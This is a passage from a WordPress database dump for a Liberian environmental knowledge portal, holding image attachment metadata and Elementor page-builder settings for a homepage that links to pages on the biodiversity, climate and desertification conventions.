";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31555,4457,'_wp_page_template','default'),(31556,4457,'internet','http://moeliberia.com/'),(31557,4457,'_pods_institution_logo','a:1:{i:0;i:4459;}'),(31560,4461,'_ca_post_type','4457'),(31561,4460,'_edit_last','42'),(31562,4460,'_ca_handle','0'),(31563,4460,'_ca_host','sidebar'),(31564,4460,'_ca_merge_pos','0'),(31565,4460,'_edit_lock','1634557922:42'),(31568,4465,'_wp_attached_file','2021/10/MOE.png'),(31569,4465,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2021/10/MOE.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"MOE-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"MOE-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"MOE-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"MOE-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"MOE-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"MOE-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"MOE-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"MOE-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"MOE-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"MOE-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"MOE-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31570,4457,'_thumbnail_id','4465'),(31571,4457,'institution_logo','4459'),(31572,4467,'_wp_attached_file','2019/11/national-legislature.png'),(31573,4467,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:32:\"2019/11/national-legislature.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"national-legislature-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"national-legislature-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"national-legislature-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"national-legislature-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:31:\"national-legislature-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:32:\"national-legislature-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:32:\"national-legislature-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:32:\"national-legislature-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:32:\"national-legislature-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:32:\"national-legislature-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:32:\"national-legislature-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31574,1590,'_thumbnail_id','4467'),(31575,4468,'_wp_page_template','default'),(31576,4468,'_elementor_edit_mode','builder'),(31577,4468,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(31578,4468,'_elementor_version','3.4.0'),(31579,4468,'_elementor_template_type','wp-page'),(31580,4468,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(31582,4468,'_elementor_pro_version','3.3.6'),(31584,4469,'_wp_page_template','default'),(31585,4469,'_elementor_edit_mode','builder'),(31586,4469,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, 